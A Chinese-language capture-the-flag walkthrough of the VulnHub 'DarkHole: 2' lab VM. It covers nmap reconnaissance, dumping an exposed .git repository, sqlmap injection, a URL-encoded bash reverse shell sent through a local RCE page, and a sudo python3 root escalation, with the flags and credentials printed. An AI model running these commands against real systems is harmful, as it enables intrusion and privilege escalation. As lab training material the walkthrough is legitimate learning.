[vulnhub] DarkHole: 2
https://www.vulnhub.com/entry/darkhole-2,740/
端口扫描主机发现
-
探测存活主机,
185是靶机# nmap -sP 192.168.75.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 18:02 CST Nmap scan report for 192.168.75.1 Host is up (0.00036s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.75.2 Host is up (0.00030s latency). MAC Address: 00:50:56:FB:CA:45 (VMware) Nmap scan report for 192.168.75.185 Host is up (0.00028s latency). MAC Address: 00:0C:29:1E:D3:AD (VMware) Nmap scan report for 192.168.75.254 Host is up (0.00033s latency). MAC Address: 00:50:56:FE:CA:7A (VMware) Nmap scan report for 192.168.75.151 -
探测主机所有开放端口
nmap -sT -min-rate 10000 -p- 192.168.75.185 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 18:03 CST Nmap scan report for 192.168.75.185 Host is up (0.00040s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:1E:D3:AD (VMware) -
探测服务版本以及系统版本
nmap -sV -sT -O -p 80,22 192.168.75.185 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 18:04 CST Nmap scan report for 192.168.75.185 Host is up (0.00067s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) MAC Address: 00:0C:29:1E:D3:AD (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel -
扫描漏洞
nmap -script=vuln -p 80,22 192.168.75.185 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 18:05 CST Nmap scan report for 192.168.75.185 Host is up (0.00078s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-git: | 192.168.75.185:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: i changed login.php file for more secure |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.185 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.75.185:80/login.php | Form id: email |_ Form action: | http-cookie-flags: | /: | PHPSESSID: | httponly flag not set | /login.php: | PHPSESSID: |_ httponly flag not set |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-enum: | /login.php: Possible admin folder | /.git/HEAD: Git folder | /config/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)' | /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)' |_ /style/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'找到
.git,可能存在源码泄露
web渗透
-
访问主页,存在登陆页面连接
-
扫描目录
dirsearch -u http://192.168.75.185 -x 403,404 // [18:11:11] 301 - 313B - /js -> http://192.168.75.185/js/ [18:11:13] 301 - 315B - /.git -> http://192.168.75.185/.git/ [18:11:13] 200 - 600B - /.git/ [18:11:13] 200 - 41B - /.git/COMMIT_EDITMSG [18:11:13] 200 - 73B - /.git/description [18:11:13] 200 - 23B - /.git/HEAD [18:11:13] 200 - 674B - /.git/hooks/ [18:11:13] 200 - 130B - /.git/config [18:11:13] 200 - 1KB - /.git/index [18:11:13] 200 - 460B - /.git/info/ [18:11:13] 200 - 240B - /.git/info/exclude [18:11:13] 200 - 485B - /.git/logs/ [18:11:13] 200 - 554B - /.git/logs/HEAD [18:11:13] 301 - 331B - /.git/logs/refs/heads -> http://192.168.75.185/.git/logs/refs/heads/ [18:11:13] 200 - 554B - /.git/logs/refs/heads/master [18:11:13] 200 - 669B - /.git/objects/ [18:11:13] 301 - 325B - /.git/logs/refs -> http://192.168.75.185/.git/logs/refs/ [18:11:13] 200 - 41B - /.git/refs/heads/master [18:11:13] 301 - 326B - /.git/refs/heads -> http://192.168.75.185/.git/refs/heads/ [18:11:13] 301 - 325B - /.git/refs/tags -> http://192.168.75.185/.git/refs/tags/ [18:11:13] 200 - 465B - /.git/refs/ [18:11:13] 200 - 510B - /.idea/ [18:11:13] 301 - 316B - /.idea -> http://192.168.75.185/.idea/ [18:11:14] 200 - 192B - /.idea/modules.xml [18:11:14] 200 - 926B - /.idea/workspace.xml [18:11:32] 301 - 317B - /config -> http://192.168.75.185/config/ [18:11:33] 200 - 457B - /config/ [18:11:34] 200 - 11B - /dashboard.php [18:11:43] 200 - 456B - /js/ [18:11:45] 200 - 484B - /login.php [18:11:46] 302 - 0B - /logout.php -> index.php [18:12:03] 301 - 316B - /style -> http://192.168.75.185/style/- 清一色的
.git可以尝试有没有.git源码泄露 config/应该是配置文件
- 清一色的
-
测试是否存在源码泄露
https://www.freebuf.com/articles/web/346607.html
因为我们找到了
.git,所以我们要针对git-
访问
/.git/config存在该目录,存在源码泄露漏洞[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true -
使用工具
git-dumperhttps://github.com/arthaud/git-dumper
使用
pip install git-dumper安装git-dumper http://192.168.75.185/.git/ ./185将所有源码文件下载下来了,下载到当前目录的
185文件夹里ls -al ./185 // drwxr-xr-x 7 root root 4096 11月 9日 01:25 . drwxr-xr-x 4 root root 4096 11月 9日 01:41 .. drwxr-xr-x 2 root root 4096 11月 9日 01:25 config -rw-r--r-- 1 root root 5578 11月 9日 01:25 dashboard.php drwxr-xr-x 7 root root 4096 11月 9日 01:25 .git drwxr-xr-x 2 root root 4096 11月 9日 01:25 .idea -rw-r--r-- 1 root root 1094 11月 9日 01:25 index.php drwxr-xr-x 2 root root 4096 11月 9日 01:25 js -rw-r--r-- 1 root root 1493 11月 9日 01:25 login.php -rw-r--r-- 1 root root 179 11月 9日 01:25 logout.php drwxr-xr-x 2 root root 4096 11月 9日 01:25 style
-
代码审计
上面已将源码文件下载了,现在开始要代码审计
-
config.php文件,是数据库配置文件,用户名为root但是密码为空<?php $connect = new mysqli("localhost","root","","darkhole_2"); -
login.php<?php session_start(); require 'config/config.php'; if($_SERVER['REQUEST_METHOD'] == 'POST'){ $email = mysqli_real_escape_string($connect,htmlspecialchars($_POST['email'])); $pass = mysqli_real_escape_string($connect,htmlspecialchars($_POST['password'])); $check = $connect->query("select * from users where email='$email' and password='$pass' and id=1"); if($check->num_rows){ $_SESSION['userid'] = 1; header("location:dashboard.php"); die(); } } ?>应该是可以绕过的?但是我没有成功
-
进入
185文件夹查看日志(因为文件夹还留着.git,所以可以使用git命令)git log // commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4 (HEAD -> master) Author: Jehad Alqurashi <anmar-v7@hotmail.com> Date: Mon Aug 30 13:14:32 2021 +0300 i changed login.php file for more secure commit a4d900a8d85e8938d3601f3cef113ee293028e10 Author: Jehad Alqurashi <anmar-v7@hotmail.com> Date: Mon Aug 30 13:06:20 2021 +0300 I added login.php file with default credentials commit aa2a5f3aa15bb402f2b90a07d86af57436d64917 Author: Jehad Alqurashi <anmar-v7@hotmail.com> Date: Mon Aug 30 13:02:44 2021 +0300出现三次提交以及作者时间等
-
对比三次提交
git diff#获得当前目录上次提交和本地索引的差距,也就是你在什么地方修改了代码.# git diff 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4 # git diff a4d900a8d85e8938d3601f3cef113ee293028e10 diff --git a/login.php b/login.php index 8a0ff67..0904b19 100644 --- a/login.php +++ b/login.php @@ -2,7 +2,10 @@ session_start(); require 'config/config.php'; if($_SERVER['REQUEST_METHOD'] == 'POST'){ - if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){ + $email = mysqli_real_escape_string($connect,htmlspecialchars($_POST['email'])); + $pass = mysqli_real_escape_string($connect,htmlspecialchars($_POST['password'])); + $check = $connect->query("select * from users where email='$email' and password='$pass' and id=1"); + if($check->num_rows){ $_SESSION['userid'] = 1; header("location:dashboard.php"); die();可以看到
- if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321")出现了邮箱以及密码,可以尝试登陆后台
-
使用的得到账号密码登录后台,成功进入
利用后台
-
使用的得到账号密码登录后台,成功进入后台
-
url是/dashboard.php?id=1,像是存在sql注入,可以尝试下/dashboard.php?id=1' # 页面空白 /dashboard.php?id=1'--+ # 成功闭合,存在注入就不使用手工注入了,直接上
sqlmap,记得要想拿到cookie,不然没有登陆状态sqlmap -u http://192.168.75.185/dashboard.php?id=1 --cookie PHPSESSID=n22sg8e16sjbgs2c7g7kffofmf -batch爆出两张表
users以及ssh,ssh应该是能使用ssh登录的用户,两张表的数据我们都dump下# users +----+----------------+-------------------------------------------+----------+-----------------------------+----------------+ | id | email | address | password | username | contact_number | +----+----------------+-------------------------------------------+----------+-----------------------------+----------------+ | 1 | lush@admin.com | Street, Pincode, Province/State, Country | 321 | Jehad Alqurashiasddasdasdas | 1 | +----+----------------+-------------------------------------------+----------+-----------------------------+----------------+ # ssh +----+------+--------+ | id | pass | user | +----+------+--------+ | 1 | fool | jehad | +----+------+--------+ -
我们拿
ssh表的用户去登陆下
提权 - jehad用户
-
我们拿
ssh表的用户去登陆下ssh jehad@192.168.75.185 jehad@darkhole:~$获得
shell!!! -
查看权限
jehad@darkhole:~$ whoami jehad jehad@darkhole:~$ id uid=1001(jehad) gid=1001(jehad) groups=1001(jehad) jehad@darkhole:~$ uname -a Linux darkhole 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux -
寻找敏感文件
-
/home/losy目录下存在user.txt是flag文件ehad@darkhole:/home/losy$ cat user.txt DarkHole{'This_is_the_life_man_better_than_a_cruise'} -
寻找SUID文件
jehad@darkhole:/home/losy$ find / -perm -u=s -type f 2>/dev/null 02:06:46 [3/65] /usr/bin/sudo /usr/bin/passwd /usr/bin/chfn /usr/bin/chsh /usr/bin/fusermount /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/newgrp /usr/bin/umount /usr/bin/mount /usr/bin/su /usr/bin/at /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/snapd/snap-confine想尝试
snapd提权的,但是版本对不上
-
-
查看
bash历史记录jehad@darkhole:~$ cat .bash_history
发现执行了很多
curl "http://127.0.0.1:9999/?cmd=<命令>"之类的,估计9999端口下是一个能进行RCE的页面 -
我们也尝试执行下
-
先试试
id,发现是losy的权限jehad@darkhole:~$ curl http://127.0.0.1:9999/?cmd=id Parameter GET['cmd']uid=1002(losy) gid=1002(losy) groups=1002(losy)
-
-
获得
losy用户的权限-
跟着反弹shell命令
因为靶机的
nc没有-e参数,只能通过其他方式来反弹shell# 通过shell bash -c 'bash -i >& /dev/tcp/192.168.75.151/1234 0>&1' -
将其进行URl编码
bash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.75.151%2f1234+0%3e%261%27 -
构建命令
curl "http://127.0.0.1:9999/?cmd=bash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.75.151%2f1234+0%3e%261%27" -
kali开启监听,执行命令nc -lvp 1234 listening on [any] 1234 ... 192.168.75.185: inverse host lookup failed: Unknown host connect to [192.168.75.151] from (UNKNOWN) [192.168.75.185] 33342 bash: cannot set terminal process group (1215): Inappropriate ioctl for device bash: no job control in this shell losy@darkhole:/opt/web$获得
losy的shell!!!
-
提权 - losy用户
-
和之前一样,我们先查看
bash历史记录
可以找到
losy的密码为gang -
进行
ssh登录,能过得交互性更好的shell -
查看权限
-
SUDO,可以以root权限执行python3,可以提权了```python losy@darkhole:~$ sudo -l [sudo] password for losy: Matching Defaults entries for losy on darkhole: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User losy may run the following commands on darkhole: (root) /usr/bin/python3
-
-
使用
python3提权,使用python生成虚拟终端即可losy@darkhole:~$ sudo /usr/bin/python3 -c "import pty;pty.spawn('/bin/sh')" # whoami root获得
root!!!! -
读取
flag文件# cat root.txt DarkHole{'Legend'}
总结
.git的使用,以及git diff;以及bash_history也可能存在敏感内容;